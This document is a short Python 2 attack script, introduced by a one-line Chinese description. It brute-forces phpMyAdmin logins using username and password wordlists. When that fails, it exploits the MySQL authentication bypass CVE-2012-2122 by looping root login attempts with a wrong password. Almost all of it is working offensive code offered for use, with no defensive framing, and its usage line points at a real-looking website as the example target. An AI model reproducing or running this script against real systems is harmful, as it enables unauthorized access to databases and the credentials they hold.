PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。
#!/usr/bin/env python
import urllib
import urllib2
import cookielib
import sys
import subprocess
def Crack(url,username,password):
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
headers = {\'User-Agent\' : \'Mozilla/5.0 (Windows NT 6.1; WOW64)\'}
params = urllib.urlencode({\'pma_username\': username, \'pma_password\': password})
request = urllib2.Request(url+\"/index.php\", params,headers)
response = opener.open(request)
a=response.read()
if a.find(\'Database server\')!=-1 and a.find(\'name=\"login_form\"\')==-1:
return username,password
return 0
def MySQLAuthenticationBypassCheck(host,port):
i=0
while i<300:
i=i+1
subprocess.Popen(\"mysql --host=%s -P %s -uroot -piswin\" % (host,port),shell=True).wait()
if __name__ == \'__main__\':
if len(sys.argv)<4:
print \"#author:iswin\\n#useage python pma.py http://www.jb51.net/phpmyadmin/ username.txt password.txt\"
sys.exit()
print \"Bruting,Pleas wait...\"
for name in open(sys.argv[2],\"r\"):
for passw in open(sys.argv[3],\"r\"):
state=Crack(sys.argv[1],name,passw)
if state!=0:
print \"\\nBrute successful\"
print \"UserName: \"+state[0]+\"PassWord: \"+state[1]
sys.exit()
print \"Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck\"
choice=raw_input(\'Warning:This function needs mysql environment.\\nY:Try to MySQLAuthenticationBypassCheck\\nOthers:Exit\\n\')
if choice==\'Y\' or choice==\'y\':
host=raw_input(\'Host:\')
port=raw_input(\'Port:\')
MySQLAuthenticationBypassCheck(host,port)